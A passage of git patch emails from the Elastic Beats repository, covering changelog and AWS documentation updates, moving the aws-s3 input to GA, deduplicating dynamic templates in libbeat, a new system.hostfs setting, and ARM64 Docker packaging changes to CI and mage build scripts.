dataset for Juniper SRX logs. {pull}20017[20017] - Adding support for Microsoft 365 Defender (Microsoft Threat Protection) {pull}21446[21446] - Adding support for FIPS in s3 input {pull}21446[21446] @@ -845,6 +831,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Journalbeat* + *Metricbeat* - Move the windows pdh implementation from perfmon to a shared location in order for future modules/metricsets to make use of. {pull}15503[15503] @@ -932,7 +919,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added cache and connection_errors metrics to status metricset of MySQL module {issue}16955[16955] {pull}19844[19844] - Update MySQL dashboard with connection errors and cache metrics {pull}19913[19913] {issue}16955[16955] - Add cloud.instance.name into aws ec2 metricset. {pull}20077[20077] -- Add host inventory metrics into aws ec2 metricset. {pull}20171[20171] - Add `scope` setting for elasticsearch module, allowing it to monitor an Elasticsearch cluster behind a load-balancing proxy. {issue}18539[18539] {pull}18547[18547] - Add state_daemonset metricset for Kubernetes Metricbeat module {pull}20649[20649] - Add host inventory metrics to azure compute_vm metricset. {pull}20641[20641] @@ -948,7 +934,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Sanitize `event.host`. {pull}21022[21022] - Add support for different Azure Cloud environments in the metricbeat azure module. {pull}21044[21044] {issue}20988[20988] - Add overview and platform health dashboards to Cloud Foundry module. {pull}21124[21124] -- Release lambda metricset in aws module as GA. {issue}21251[21251] {pull}21255[21255] - Add dashboard for pubsub metricset in googlecloud module. {pull}21326[21326] {issue}17137[17137] - Move Prometheus query & remote_write to GA. {pull}21507[21507] - Expand unsupported option from namespace to metrics in the azure module. {pull}21486[21486] @@ -1022,9 +1007,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Filebeat* -- The experimental modules for Citrix Netscaler and Symantec Endpoint Protection have been removed. - As we continue to expand our coverage of common security data sources, we may consider supporting - Citrix Netscaler and Symantec Endpoint Protection in a future release. {issue}23129[23129] {pull}23130[23130] *Heartbeat* diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index b870aabf0776..08fdad1c8239 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> From 35ca7e3d0e2c5491568c850e727c0a507ef51baf Mon Sep 17 00:00:00 2001 From: kaiyan-sheng Date: Fri, 5 Feb 2021 15:32:57 -0700 Subject: [PATCH 04/63] Improve cloudwatch and awsfargate documentation (#23862) --- .../module/aws/cloudwatch/_meta/docs.asciidoc | 32 +++++++++++++++++++ .../module/awsfargate/cloudformation.yml | 2 +- .../awsfargate/task_stats/_meta/docs.asciidoc | 6 ++-- 3 files changed, 37 insertions(+), 3 deletions(-) diff --git a/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc b/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc index a66f13acd6a9..ae8bca398cad 100644 --- a/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc @@ -99,6 +99,38 @@ will get lost. Metrics from namespace AWS/Billing are sent to Cloudwatch every several hours. By querying from AWS/Billing namespace every 300 seconds, additional costs will occur. +[float] +==== Example 3 +Depends on the configuration and number of services in the AWS account, the number +of API calls may get too big to cause high API cost. In order to reduce the number +of API calls, we recommend users to use this configuration below as an example. + +* *metrics.name*: Only collect a sub list of metrics that are useful to your use case. +* *metrics.statistic*: By default, cloudwatch metricset will make API calls to +get all stats like average, max, min, sum and etc. If the user knows which +statistics method is most useful, specify it in the configuration. +* *metrics.dimensions*: Different AWS services report different dimensions in their +CloudWatch metrics. For example, https://docs.aws.amazon.com/emr/latest/ManagementGuide/UsingEMR_ViewingMetrics.html[EMR metrics] +can have either `JobFlowId` dimension or `JobId` dimension. If user knows which +specific dimension is useful, it can be specified in this configuration option. + +[source,yaml] +---- +- module: aws + period: 5m + metricsets: + - cloudwatch + regions: us-east-1 + metrics: + - namespace: AWS/ElasticMapReduce + name: ["S3BytesWritten", "S3BytesRead", "HDFSUtilization", "TotalLoad"] + resource_type: elasticmapreduce + statistic: ["Average"] + dimensions: + - name: JobId + value: "*" +---- + [float] === More examples With the configuration below, users will be able to collect cloudwatch metrics diff --git a/x-pack/metricbeat/module/awsfargate/cloudformation.yml b/x-pack/metricbeat/module/awsfargate/cloudformation.yml index ac43e044edce..515a4da35ff5 100644 --- a/x-pack/metricbeat/module/awsfargate/cloudformation.yml +++ b/x-pack/metricbeat/module/awsfargate/cloudformation.yml @@ -61,7 +61,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: metricbeat-container - Image: docker.elastic.co/beats/metricbeat:7.11.0-SNAPSHOT + Image: docker.elastic.co/beats/metricbeat:8.0.0-SNAPSHOT Secrets: - Name: ELASTIC_CLOUD_ID ValueFrom: !Ref CloudIDArn diff --git a/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc b/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc index 1bc226bdd534..6940bfc8f710 100644 --- a/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc @@ -110,7 +110,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: metricbeat-container - Image: docker.elastic.co/beats/metricbeat:7.11.0-SNAPSHOT + Image: docker.elastic.co/beats/metricbeat:8.0.0-SNAPSHOT Secrets: - Name: ELASTIC_CLOUD_ID ValueFrom: !Ref CloudIDArn @@ -158,7 +158,9 @@ Resources: [float] ==== Create CloudFormation Stack -Once the CloudFormation template is saved locally into `clouformation.yml`, AWS +When copying the CloudFormation template, please make sure the Metricbeat +container image is the correct version. +Once the template is saved locally into `clouformation.yml`, AWS CLI can be used to create a stack using one command: ---- aws --region us-east-1 cloudformation create-stack --stack-name --template-body file://./cloudformation.yml --capabilities CAPABILITY_NAMED_IAM --parameters ParameterKey=SubnetID,ParameterValue= ParameterKey=CloudAuthArn,ParameterValue= ParameterKey=CloudIDArn,ParameterValue= ParameterKey=ClusterName,ParameterValue= ParameterKey=RoleName,ParameterValue= ParameterKey=TaskName,ParameterValue= ParameterKey=ServiceName,ParameterValue= ParameterKey=LogGroupName,ParameterValue= From a16bfd37c5bd54881200755ab200d16bba696ee5 Mon Sep 17 00:00:00 2001 From: kaiyan-sheng Date: Fri, 5 Feb 2021 15:35:47 -0700 Subject: [PATCH 05/63] Move aws-s3 input to GA (#23631) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/input/awss3/_meta/fields.yml | 2 +- x-pack/filebeat/input/awss3/fields.go | 2 +- x-pack/filebeat/input/awss3/input.go | 2 +- 4 files changed, 4 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 1a449a5bd1fb..c6e99a9d330a 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -821,6 +821,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] - Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] - Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] - Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] diff --git a/x-pack/filebeat/input/awss3/_meta/fields.yml b/x-pack/filebeat/input/awss3/_meta/fields.yml index c937f8282e84..a4dfe8be68c6 100644 --- a/x-pack/filebeat/input/awss3/_meta/fields.yml +++ b/x-pack/filebeat/input/awss3/_meta/fields.yml @@ -2,7 +2,7 @@ title: "s3" description: > S3 fields from s3 input. - release: beta + release: ga fields: - name: bucket_name type: keyword diff --git a/x-pack/filebeat/input/awss3/fields.go b/x-pack/filebeat/input/awss3/fields.go index c507150f8e4b..ae8d04dce148 100644 --- a/x-pack/filebeat/input/awss3/fields.go +++ b/x-pack/filebeat/input/awss3/fields.go @@ -19,5 +19,5 @@ func init() { // AssetAwss3 returns asset data. // This is the base64 encoded gzipped contents of input/awss3. func AssetAwss3() string { - return "eJykjjGugzAQRHufYkQPjTsX/wi/+QdABg8fB4ORvSTi9pGBJlKkFNlipZ3dnTc1Ju4GWStAvAQaVFlXCnDMffKr+LgY/CgA+NMYPIPLGFKckTX8sm7SKCAx0GYadBSrcN2Z463GYuey2vqJ0pbh0AHZV5qS4BGTu7Q33FK/dibiABlZcpxekNGW5jNC/EeiJM873ZGveYHH7sZe2on71+zT6gP7GQAA//+k2GkG" + return "eJykjrFuhDAQRHt/xYgeGncu8glp8gHI4AEcDEb2koi/PxloTjrpittipR3tzJsaMw+DrBUgXgINqqwrBTjmPvlNfFwNvhQA/GgMnsFlDCkuyBp+3XZpFJAYaDMNRqtwf5nTVGO1Cw26vZ8pbTlOHZBjoyn8/5jcrb2glvm2CxEHyMTS4sqCTLYsnxHiiERJnn90Z7vmCR67X/bSzjw+Zl9Rb9iPAAAA//+ahmgy" } diff --git a/x-pack/filebeat/input/awss3/input.go b/x-pack/filebeat/input/awss3/input.go index 98d8c60d77b4..ccbe105974d8 100644 --- a/x-pack/filebeat/input/awss3/input.go +++ b/x-pack/filebeat/input/awss3/input.go @@ -25,7 +25,7 @@ const inputName = "aws-s3" func Plugin() v2.Plugin { return v2.Plugin{ Name: inputName, - Stability: feature.Beta, + Stability: feature.Stable, Deprecated: false, Info: "Collect logs from s3", Manager: v2.ConfigureWith(configure), From 56890b3fc36c1fd43753f2a16b40462839ebc230 Mon Sep 17 00:00:00 2001 From: DeDe Morton Date: Fri, 5 Feb 2021 15:35:01 -0800 Subject: [PATCH 06/63] Remove release state override (#23866) --- libbeat/docs/shared-beats-attributes.asciidoc | 1 - 1 file changed, 1 deletion(-) diff --git a/libbeat/docs/shared-beats-attributes.asciidoc b/libbeat/docs/shared-beats-attributes.asciidoc index 56dee789d4d2..c2e83951bc55 100644 --- a/libbeat/docs/shared-beats-attributes.asciidoc +++ b/libbeat/docs/shared-beats-attributes.asciidoc @@ -18,4 +18,3 @@ :beat_version_key: agent.version :access_role: {beat_default_index_prefix}_reader :repo: Beats -:release-state: released From c0bfea48abb66eccc671a1802cd330cbbfe8fa56 Mon Sep 17 00:00:00 2001 From: Andrew Wilkins Date: Sat, 6 Feb 2021 08:50:21 +0800 Subject: [PATCH 07/63] libbeat/template: duplicate entries in fields.yml leads to repeated dynamic templates (#23240) * libbeat/template: deduplicate dynamic templates In case of duplicate fields, do not generate duplicate dynamic_template items. We already deduplicate field mappings because we update a map. * libbeat/template: preserve dynamic template order --- libbeat/template/processor.go | 34 +++++++++++++++++++++++++----- libbeat/template/processor_test.go | 6 +++--- libbeat/template/template.go | 22 ++++++++----------- 3 files changed, 41 insertions(+), 21 deletions(-) diff --git a/libbeat/template/processor.go b/libbeat/template/processor.go index 15bc2d2790eb..6a6add512fa9 100644 --- a/libbeat/template/processor.go +++ b/libbeat/template/processor.go @@ -31,6 +31,11 @@ type Processor struct { EsVersion common.Version Migration bool ElasticLicensed bool + + // dynamicTemplatesMap records which dynamic templates have been added, to prevent duplicates. + dynamicTemplatesMap map[dynamicTemplateKey]common.MapStr + // dynamicTemplates records the dynamic templates in the order they were added. + dynamicTemplates []common.MapStr } var ( @@ -420,7 +425,7 @@ func (p *Processor) object(f *mapping.Field) common.MapStr { if len(otParams) > 1 { path = fmt.Sprintf("%s_%s", path, matchingType) } - addDynamicTemplate(path, pathMatch, dynProperties, matchingType) + p.addDynamicTemplate(path, pathMatch, dynProperties, matchingType) } properties := getDefaultProperties(f) @@ -436,8 +441,27 @@ func (p *Processor) object(f *mapping.Field) common.MapStr { return properties } -func addDynamicTemplate(path string, pathMatch string, properties common.MapStr, matchType string) { - template := common.MapStr{ +type dynamicTemplateKey struct { + path string + pathMatch string + matchType string +} + +func (p *Processor) addDynamicTemplate(path string, pathMatch string, properties common.MapStr, matchType string) { + key := dynamicTemplateKey{ + path: path, + pathMatch: pathMatch, + matchType: matchType, + } + if p.dynamicTemplatesMap == nil { + p.dynamicTemplatesMap = make(map[dynamicTemplateKey]common.MapStr) + } else { + if _, ok := p.dynamicTemplatesMap[key]; ok { + // Dynamic template already added. + return + } + } + dynamicTemplate := common.MapStr{ // Set the path of the field as name path: common.MapStr{ "mapping": properties, @@ -445,8 +469,8 @@ func addDynamicTemplate(path string, pathMatch string, properties common.MapStr, "path_match": pathMatch, }, } - - dynamicTemplates = append(dynamicTemplates, template) + p.dynamicTemplatesMap[key] = dynamicTemplate + p.dynamicTemplates = append(p.dynamicTemplates, dynamicTemplate) } func getDefaultProperties(f *mapping.Field) common.MapStr { diff --git a/libbeat/template/processor_test.go b/libbeat/template/processor_test.go index 0765e84d69f2..1fb3cfb08e07 100644 --- a/libbeat/template/processor_test.go +++ b/libbeat/template/processor_test.go @@ -317,7 +317,6 @@ func TestProcessor(t *testing.T) { } func TestDynamicTemplates(t *testing.T) { - p := &Processor{} tests := []struct { field mapping.Field expected []common.MapStr @@ -493,9 +492,10 @@ func TestDynamicTemplates(t *testing.T) { } for _, test := range tests { - dynamicTemplates = nil + p := &Processor{} p.object(&test.field) - assert.Equal(t, test.expected, dynamicTemplates) + p.object(&test.field) // should not be added twice + assert.Equal(t, test.expected, p.dynamicTemplates) } } diff --git a/libbeat/template/template.go b/libbeat/template/template.go index f6366ddc6761..8ed8886e9196 100644 --- a/libbeat/template/template.go +++ b/libbeat/template/template.go @@ -37,9 +37,6 @@ var ( defaultNumberOfRoutingShards = 30 defaultMaxDocvalueFieldsSearch = 200 - // Array to store dynamicTemplate parts in - dynamicTemplates []common.MapStr - defaultFields []string ) @@ -147,7 +144,6 @@ func (t *Template) load(fields mapping.Fields) (common.MapStr, error) { t.Lock() defer t.Unlock() - dynamicTemplates = nil defaultFields = nil var err error @@ -164,7 +160,8 @@ func (t *Template) load(fields mapping.Fields) (common.MapStr, error) { if err := processor.Process(fields, nil, properties); err != nil { return nil, err } - output := t.Generate(properties, dynamicTemplates) + + output := t.Generate(properties, processor.dynamicTemplates) return output, nil } @@ -255,17 +252,16 @@ func (t *Template) GetPattern() string { func (t *Template) Generate(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { switch t.templateType { case IndexTemplateLegacy: - return t.generateLegacy(properties) + return t.generateLegacy(properties, dynamicTemplates) case IndexTemplateComponent: - return t.generateComponent(properties) + return t.generateComponent(properties, dynamicTemplates) case IndexTemplateIndex: - return t.generateIndex(properties) - default: + return t.generateIndex(properties, dynamicTemplates) } return nil } -func (t *Template) generateLegacy(properties common.MapStr) common.MapStr { +func (t *Template) generateLegacy(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { keyPattern, patterns := buildPatternSettings(t.esVersion, t.GetPattern()) return common.MapStr{ keyPattern: patterns, @@ -284,7 +280,7 @@ func (t *Template) generateLegacy(properties common.MapStr) common.MapStr { } } -func (t *Template) generateComponent(properties common.MapStr) common.MapStr { +func (t *Template) generateComponent(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { return common.MapStr{ "template": common.MapStr{ "mappings": buildMappings( @@ -302,8 +298,8 @@ func (t *Template) generateComponent(properties common.MapStr) common.MapStr { } } -func (t *Template) generateIndex(properties common.MapStr) common.MapStr { - tmpl := t.generateComponent(properties) +func (t *Template) generateIndex(properties common.MapStr, dynamicTemplates []common.MapStr) common.MapStr { + tmpl := t.generateComponent(properties, dynamicTemplates) tmpl["priority"] = t.priority keyPattern, patterns := buildPatternSettings(t.esVersion, t.GetPattern()) tmpl[keyPattern] = patterns From 345a5cab2745f24b7894f65270ed34f54d9f87d0 Mon Sep 17 00:00:00 2001 From: Chris Mark Date: Mon, 8 Feb 2021 10:18:48 +0200 Subject: [PATCH 08/63] Add system.hostfs configuration option for system module (#23831) --- CHANGELOG.next.asciidoc | 1 + metricbeat/docs/modules/system.asciidoc | 3 +++ metricbeat/metricbeat.reference.yml | 3 +++ .../module/system/_meta/config.reference.yml | 3 +++ metricbeat/module/system/_meta/config.yml | 2 ++ metricbeat/module/system/system.go | 26 +++++++++++++++++-- metricbeat/module/system/system_linux.go | 8 +++--- metricbeat/module/system/system_other.go | 2 +- metricbeat/module/system/system_windows.go | 2 +- metricbeat/modules.d/system.yml | 2 ++ x-pack/metricbeat/metricbeat.reference.yml | 3 +++ 11 files changed, 47 insertions(+), 8 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index c6e99a9d330a..51b8627e7212 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -497,6 +497,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] - Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] +- Add system.hostfs configuration option for system module. {pull}23831[23831] *Packetbeat* diff --git a/metricbeat/docs/modules/system.asciidoc b/metricbeat/docs/modules/system.asciidoc index bdfe4bbe84c4..315cae1201b0 100644 --- a/metricbeat/docs/modules/system.asciidoc +++ b/metricbeat/docs/modules/system.asciidoc @@ -178,6 +178,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index 5fcd2492785c..b2cc7ce7c1be 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml @@ -79,6 +79,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/module/system/_meta/config.reference.yml b/metricbeat/module/system/_meta/config.reference.yml index 39438686dbde..929f585e7d92 100644 --- a/metricbeat/module/system/_meta/config.reference.yml +++ b/metricbeat/module/system/_meta/config.reference.yml @@ -19,6 +19,9 @@ period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/module/system/_meta/config.yml b/metricbeat/module/system/_meta/config.yml index 6fe064892172..3f22bc5a4967 100644 --- a/metricbeat/module/system/_meta/config.yml +++ b/metricbeat/module/system/_meta/config.yml @@ -17,6 +17,8 @@ process.include_top_n: by_cpu: 5 # include top 5 processes by CPU by_memory: 5 # include top 5 processes by memory + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" - module: system period: 1m diff --git a/metricbeat/module/system/system.go b/metricbeat/module/system/system.go index 0efba5c0f16e..a6af865ca49d 100644 --- a/metricbeat/module/system/system.go +++ b/metricbeat/module/system/system.go @@ -22,10 +22,12 @@ import ( "sync" "github.com/elastic/beats/v7/libbeat/common/fleetmode" + "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/metricbeat/mb" ) var ( + // TODO: remove this flag in 8.0 since it should be replaced by system.hostfs configuration option (config.HostFS) // HostFS is an alternate mountpoint for the filesytem root, for when metricbeat is running inside a container. HostFS = flag.String("system.hostfs", "", "mountpoint of the host's filesystem for use in monitoring a host from within a container") ) @@ -39,6 +41,11 @@ func init() { } } +// Config for the system module. +type Config struct { + HostFS string `config:"system.hostfs"` // Specifies the mount point of the host’s filesystem for use in monitoring a host from within a container. +} + // Module represents the system module type Module struct { mb.BaseModule @@ -48,10 +55,25 @@ type Module struct { // NewModule instatiates the system module func NewModule(base mb.BaseModule) (mb.Module, error) { + + config := Config{ + HostFS: "", + } + err := base.UnpackConfig(&config) + if err != nil { + return nil, err + } + if *HostFS != "" { + if config.HostFS != "" { + logp.Warn("-system.hostfs flag is set and will override configuration setting") + } + config.HostFS = *HostFS + } + // This only needs to be configured once for all system modules. once.Do(func() { - initModule() + initModule(config) }) - return &Module{BaseModule: base, HostFS: *HostFS, IsAgent: fleetmode.Enabled()}, nil + return &Module{BaseModule: base, HostFS: config.HostFS, IsAgent: fleetmode.Enabled()}, nil } diff --git a/metricbeat/module/system/system_linux.go b/metricbeat/module/system/system_linux.go index 72477566a93c..6f3f15a1135c 100644 --- a/metricbeat/module/system/system_linux.go +++ b/metricbeat/module/system/system_linux.go @@ -24,12 +24,12 @@ import ( "github.com/elastic/gosigar" ) -func initModule() { - configureHostFS() +func initModule(config Config) { + configureHostFS(config) } -func configureHostFS() { - dir := *HostFS +func configureHostFS(config Config) { + dir := config.HostFS if dir == "" { dir = "/" } diff --git a/metricbeat/module/system/system_other.go b/metricbeat/module/system/system_other.go index 8d89efbd485e..c526d363b282 100644 --- a/metricbeat/module/system/system_other.go +++ b/metricbeat/module/system/system_other.go @@ -19,6 +19,6 @@ package system -func initModule() { +func initModule(config Config) { // Stub method for non-linux. } diff --git a/metricbeat/module/system/system_windows.go b/metricbeat/module/system/system_windows.go index 154481eb657e..1c95b3e92f96 100644 --- a/metricbeat/module/system/system_windows.go +++ b/metricbeat/module/system/system_windows.go @@ -22,7 +22,7 @@ import ( "github.com/elastic/beats/v7/metricbeat/helper" ) -func initModule() { +func initModule(config Config) { if err := helper.CheckAndEnableSeDebugPrivilege(); err != nil { logp.Warn("%v", err) } diff --git a/metricbeat/modules.d/system.yml b/metricbeat/modules.d/system.yml index cf433cde96e0..625e000bd5e9 100644 --- a/metricbeat/modules.d/system.yml +++ b/metricbeat/modules.d/system.yml @@ -20,6 +20,8 @@ process.include_top_n: by_cpu: 5 # include top 5 processes by CPU by_memory: 5 # include top 5 processes by memory + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" - module: system period: 1m diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index 39e66be15e73..50127225c63e 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml +++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -79,6 +79,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. From 35e2e99e2df4fc8fe948d3dc167d42125da6934a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Mon, 8 Feb 2021 16:14:49 +0100 Subject: [PATCH 09/63] Add support for ARM64 Docker images for all Beats (#23592) This PR adds support for building ARM64 Docker images for all Beats on ARM64 machines. To limit what packages should be built I have added the new environment variable named `PACKAGES`. It expects a comma-separated list of packages types. Available options: rpm, deb, tgz, dmg, docker, zip. If nothing is specified all available package types are built for the given platform. This PR relies on the newly added crossbuild image with the suffix `base-arm-debian9`. This image is automatically selected if the runtime of the builder machine is ARM64. --- .ci/packaging.groovy | 98 ++++++++++++++++++- dev-tools/mage/build.go | 1 + dev-tools/mage/crossbuild.go | 32 ++++-- dev-tools/mage/dockerbuilder.go | 16 ++- dev-tools/mage/pkg.go | 25 ++++- dev-tools/mage/pkgtypes.go | 2 + dev-tools/packaging/packages.yml | 38 +++++-- .../docker/Dockerfile.elastic-agent.tmpl | 23 +++-- .../templates/docker/Dockerfile.tmpl | 41 ++++++-- journalbeat/magefile.go | 4 + script/fix_permissions.sh | 9 +- x-pack/elastic-agent/magefile.go | 19 ++++ 12 files changed, 273 insertions(+), 35 deletions(-) diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index 7af3ff6f60c6..325084ef181f 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -40,6 +40,7 @@ pipeline { parameters { booleanParam(name: 'macos', defaultValue: false, description: 'Allow macOS stages.') booleanParam(name: 'linux', defaultValue: true, description: 'Allow linux stages.') + booleanParam(name: 'arm', defaultValue: true, description: 'Allow ARM stages.') } stages { stage('Filter build') { @@ -83,12 +84,13 @@ pipeline { } } setEnvVar("GO_VERSION", readFile("${BASE_DIR}/.go-version").trim()) + // Stash without any build/dependencies context to support different architectures. + stashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") withMageEnv(){ dir("${BASE_DIR}"){ setEnvVar('BEAT_VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) } } - stashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") } } stage('Build Packages'){ @@ -172,12 +174,73 @@ pipeline { } steps { withGithubNotify(context: "Packaging MacOS ${BEATS_FOLDER}") { - deleteDir() + deleteWorkspace() withMacOSEnv(){ release() } } } + post { + always { + // static workers require this + deleteWorkspace() + } + } + } + } + } + } + stage('Build Packages ARM'){ + matrix { + axes { + axis { + name 'BEATS_FOLDER' + values ( + 'auditbeat', + 'filebeat', + 'heartbeat', + 'journalbeat', + 'metricbeat', + 'packetbeat', + 'x-pack/auditbeat', + 'x-pack/elastic-agent', + 'x-pack/filebeat', + 'x-pack/heartbeat', + 'x-pack/metricbeat', + 'x-pack/packetbeat' + ) + } + } + stages { + stage('Package Docker images for linux/arm64'){ + agent { label 'arm' } + options { skipDefaultCheckout() } + when { + beforeAgent true + expression { + return params.arm + } + } + environment { + HOME = "${env.WORKSPACE}" + PACKAGES = "docker" + PLATFORMS = [ + 'linux/arm64', + ].join(' ') + } + steps { + withGithubNotify(context: "Packaging linux/arm64 ${BEATS_FOLDER}") { + deleteWorkspace() + release() + pushCIDockerImages() + } + } + post { + always { + // static workers require this + deleteWorkspace() + } + } } } } @@ -408,14 +471,43 @@ def getBeatsName(baseDir) { } def withBeatsEnv(Closure body) { + unstashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") + fixPermissions() withMageEnv(){ withEnv([ "PYTHON_ENV=${WORKSPACE}/python-env" ]) { - unstashV2(name: 'source', bucket: "${JOB_GCS_BUCKET_STASH}", credentialsId: "${JOB_GCS_CREDENTIALS}") dir("${env.BASE_DIR}"){ body() } } } } + +/** +* This method fixes the filesystem permissions after the build has happenend. The reason is to +* ensure any non-ephemeral workers don't have any leftovers that could cause some environmental +* issues. +*/ +def deleteWorkspace() { + catchError(buildResult: 'SUCCESS', stageResult: 'SUCCESS') { + fixPermissions() + deleteDir() + } +} + +def fixPermissions() { + if(isUnix()) { + catchError(buildResult: 'SUCCESS', stageResult: 'SUCCESS') { + dir("${env.BASE_DIR}") { + if (fileExists('script/fix_permissions.sh')) { + sh(label: 'Fix permissions', script: """#!/usr/bin/env bash + set +x + source ./dev-tools/common.bash + docker_setup + script/fix_permissions.sh ${WORKSPACE}""", returnStatus: true) + } + } + } + } +} \ No newline at end of file diff --git a/dev-tools/mage/build.go b/dev-tools/mage/build.go index 2efe61502ae2..20a6946d7794 100644 --- a/dev-tools/mage/build.go +++ b/dev-tools/mage/build.go @@ -92,6 +92,7 @@ func GolangCrossBuild(params BuildArgs) error { } defer DockerChown(filepath.Join(params.OutputDir, params.Name+binaryExtension(GOOS))) + defer DockerChown(filepath.Join(params.OutputDir)) return Build(params) } diff --git a/dev-tools/mage/crossbuild.go b/dev-tools/mage/crossbuild.go index 4340c7fdb4ea..368bd0a422d7 100644 --- a/dev-tools/mage/crossbuild.go +++ b/dev-tools/mage/crossbuild.go @@ -43,11 +43,26 @@ const defaultCrossBuildTarget = "golangCrossBuild" // See NewPlatformList for details about platform filtering expressions. var Platforms = BuildPlatforms.Defaults() +// Types is the list of package types +var SelectedPackageTypes []PackageType + func init() { // Allow overriding via PLATFORMS. if expression := os.Getenv("PLATFORMS"); len(expression) > 0 { Platforms = NewPlatformList(expression) } + + // Allow overriding via PACKAGES. + if packageTypes := os.Getenv("PACKAGES"); len(packageTypes) > 0 { + for _, pkgtype := range strings.Split(packageTypes, ",") { + var p PackageType + err := p.UnmarshalText([]byte(pkgtype)) + if err != nil { + continue + } + SelectedPackageTypes = append(SelectedPackageTypes, p) + } + } } // CrossBuildOption defines a option to the CrossBuild target. @@ -169,12 +184,13 @@ func CrossBuildXPack(options ...CrossBuildOption) error { return CrossBuild(o...) } -// buildMage pre-compiles the magefile to a binary using the native GOOS/GOARCH -// values for Docker. It has the benefit of speeding up the build because the +// buildMage pre-compiles the magefile to a binary using the GOARCH parameter. +// It has the benefit of speeding up the build because the // mage -compile is done only once rather than in each Docker container. func buildMage() error { - return sh.RunWith(map[string]string{"CGO_ENABLED": "0"}, "mage", "-f", "-goos=linux", "-goarch=amd64", - "-compile", CreateDir(filepath.Join("build", "mage-linux-amd64"))) + arch := runtime.GOARCH + return 